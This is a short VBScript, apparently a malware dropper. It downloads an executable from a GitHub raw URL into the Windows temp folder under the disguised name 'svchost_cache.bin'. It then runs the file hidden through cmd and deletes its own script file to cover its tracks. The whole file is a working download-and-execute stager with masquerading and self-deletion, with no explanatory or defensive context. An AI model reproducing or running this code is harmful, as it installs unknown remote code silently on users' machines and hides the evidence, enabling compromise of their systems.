
Set xml = CreateObject("Microsoft.XMLDOM")
Set shell = CreateObject("WScript.Shell")


url = "https://github.com/kievkeks145/r1d23/raw/refs/heads/main/Nursultan.exe"
output = shell.ExpandEnvironmentStrings("%TEMP%") & "\svchost_cache.bin"


Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", url, False
xhr.Send

If xhr.Status = 200 Then
    Set stream = CreateObject("ADODB.Stream")
    stream.Open
    stream.Type = 1
    stream.Write xhr.ResponseBody
    stream.SaveToFile output, 2
    stream.Close
    
    
    shell.Run "cmd /c start /B """ & output & """", 0, False
End If


Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile WScript.ScriptFullName